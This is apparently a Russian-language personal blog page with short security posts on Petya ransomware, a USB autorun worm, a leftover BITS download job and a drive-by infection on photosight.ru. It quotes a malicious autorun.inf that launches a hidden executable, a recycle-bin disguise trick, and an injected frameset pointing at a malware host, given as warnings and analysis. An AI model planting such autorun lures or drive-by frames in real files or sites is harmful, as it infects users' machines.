Вирус Petya или не Петя? И как защититься?

Вы наверняка уже слышали о вирусе Петя (Ransom:Win32/Petya). Новый вирус, который уже успели окрестить и NoPetya и NotPetya, официально носит название Petya.C. Этот вирус модифицирует MBR (Master Boot Record – главная загрузочная запись), прописывает в него свой код и при перезагрузке шифрует файлы, требуя выкуп. Но еще он “научился” распространяться по локальной сети и использовать существующие уязвимости. Подробнее можно почитать в статье компании Майкрософт, где рассматривается случай с распространением через обновление бухгалтерского ПО MeDoc.

Как же спасти свой ПК от заражения подобным вирусом? Можно ли защитить MBR от перезаписи или запретить удаленный запуск приложений на ПК под управлением ОС Windows? Короткий ответ — можно. Как именно – читайте далее.

Читать остальную часть заметки »

Теги: , , , , , , , , , , , , ,

Вирусы vs USB dummy protect

Нужно было перенести файлы с моего ПК на нетбук моего зятя. После того, как я вставил флешку в его нетбук, бесплатный антивирус от Microsoft – Microsoft Security Essentials – забил тревогу, сообщив, что на флешке вирус и что его нужно срочно убить.
Не поверив своим глазам, я вставил флешку обратно в свой ПК и обнаружил на ней новосозданный файл autorun.inf и папку cache.tmp.

Мы стали спорить, у кого из нас завелся троянец 🙂 Шестое чувство пятой точки подсказывало мне, что вирус на нетбуке. Простой эксперимент с перевтыканием флешки ПК->ПК и ПК->нетбук->ПК показал, что выше перечисленные файлы появляются только после того, как флешка побывала в нетбуке.

Мой зять сильно возмутился, как это MSE может допустить наличие трояна, если она же находит его на флешке?

Получается такая картина: вирус сидит мирно в памяти, MSE его не видит, а как только вставляется флешка – вирус записывается на флешку и тут же обнаруживается пресловутым творением гениев Microsoft.

Нетбук я пролечил бесплатным CureIt! от DrWeb, а содержимое файлов немного изучил.

cache.tmp – папка имела иконку корзины (по сути, она ею и являлась), и, при заходе в проводнике, – в ней показывалось содержимое корзины ПК. Делалось это с помощью хака:

файл cache.tmp\Desktop.ini

[.ShellClassInfo]
CLSID={645FF040-5081-101B-9F08-00AA002F954E}

запуск трояна на жертве происходил из файла autorun.inf:

[auTorUn]
UsEautoPLAy=1
sHeLL\open=oPeN
sheLL\OpeN\cOmmanD=cache.tmp\tmp376.exe
opeN=cache.tmp\tmp376.exe

Вообще, очень хорошо отключать автозапуск к ядреной фени. 🙂

Что же делать, если нужно перенести файлы с флешки на ПК? Можно ли защитить свою флешку от заражения?

Понятное дело, что кондом здесь не спасет. Но вполне может помочь маленькая программа.

USB Dummy protect

Эта программа не делает ничего сверхъестественного, просто заполняет все свободное пространство флешки одним файликом – dummy.file. Таким образом, вирусу просто негде будет себя записать и вы не притащите на родной комп какой-нибудь триппер троян. Мелочь, а приятно)

Скачать USB Dummy protect.


Теги: , , , , , , , , , ,

вирусы не спят

Обнаружил у себя вот такую гадость:

B:\Support Tools>BITSAdmin.exe /LIST

BITSADMIN version 2.0 [ 6.6.3790.1830 ]
BITS administration utility.
(C) Copyright 2000-2004 Microsoft Corp.

{33403F93-3B74-495C-94C5-E4D9AE01A920} E:\tmp\GUR1.exe ERROR 0 / 1 0 / UNKNOWN
Listed 1 job(s).

Какой-то нехороший вирус прописался втихую в задания, но тела вируса я не обнаружил, как и записей о его уничтожении в антивирусе. Буду надеяться, что его все-таки нет в системе ;). «ERROR» свидетельствует о неудачном выполнении задания (файла ведь нет). А удалить запланированное задание можно так:

B:\Support Tools>BITSAdmin.exe /CANCEL {33403F93-3B74-495C-94C5-E4D9AE01A920}

BITSADMIN version 2.0 [ 6.6.3790.1830 ]
BITS administration utility.
(C) Copyright 2000-2004 Microsoft Corp.

Job canceled.

Проверяем:

B:\Support Tools>BITSAdmin.exe /LIST

BITSADMIN version 2.0 [ 6.6.3790.1830 ]
BITS administration utility.
(C) Copyright 2000-2004 Microsoft Corp.

Listed 0 job(s).

Ну, вроде бы все чисто. Был только найден файл E:\tmp\GUR1.tmp. И удален.

Утилиту BITSAdmin и еще пачку других можно установить вместе в пакетом Microsoft Support Tools. Думаю, такой набор не помешает geek’у 😉

P.S.

Чуть не забыл, сервис этот (фоновое выполнение заданий) называется «Background Intelligent Transfer Service» (BITS) и, скорее всего, у вас он работает, если вы регулярно устанавливаете обновления от Microsoft. У меня система давно не дружит с обновлялкой Майкрософта, поэтому на всякий случай сервис я отключил. Все равно от него ничего не зависит 🙂


Теги: , , , , , ,

Осторожно, вирусы

Сайт photosight.ru сегодня радует своих посетителей java-вирусом. Браузер открывает страницу по коду: <html><frameset rows="100%"><frame src="http://194.8.250.211/tds/in.cgi?2"></frameset></html> и скачивает вирус. Рекомендую заблокировать следующие адреса:
178.63.170.185 (код)
194.8.250.213 (код)
194.8.250.211 (тело вируса)

Сайт уже попал в черный список Google и браузеры выводят предупреждающую страницу.

Как именно подгружается скрипт пока не наковырял, предполагаю, что есть уязвимость в рекламной (баннерной) системе openx1.photosight.ru.

UPDATE

Зараженный файл: http://openx1.photosight.ru/www/delivery/ajs.php

Написал письмо в службу поддержки сайта.


Теги: , , , , , , , ,